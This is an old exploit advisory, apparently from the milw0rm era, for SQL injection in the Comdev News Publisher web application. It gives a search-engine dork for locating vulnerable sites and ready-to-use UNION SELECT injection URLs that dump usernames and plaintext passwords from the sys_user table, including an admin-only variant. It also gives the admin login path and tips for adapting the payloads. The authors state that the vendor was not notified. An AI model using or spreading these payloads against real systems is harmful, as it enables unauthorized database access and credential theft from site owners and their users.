--==+================================================================================+==-- --==+ Comdev News Publisher SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz & xprog Discovered On: 4 April 2008 SITE: www.comdevweb.com DORK (altavista.com/google): "Powered by Comdev News Publisher" VENDOR Has Not Been Notified! DESCRIPTION: Comdev News Publisher, suffers from insecure sql querys, which allows malicous users to pull data from the database and view admin/user passwords in plaintext. EXPLOITS: All Users: www.site.com/index.php?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/* Admin: http://site.com/index.php?arcyear=-1&arcmonth=-1/**/UNION/**/ALL/**/SELECT/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11/**/FROM/**/sys_user/**/WHERE/**/permission=0x414C4C/* NOTE/TIP: admin login is located at /oneadmin/ some sites use .htm/.html extensions instead of .php and some sites use "main" instead of "index" they do this using a modified htaccess file, no worries the injections will still work just change "index.php" in the above injections. GREETZ: milw0rm.com, h4ck-y0u.org ! --==+================================================================================+==-- --==+ Comdev News Publisher SQL Injection Vulnerbilitys +==-- --==+================================================================================+==--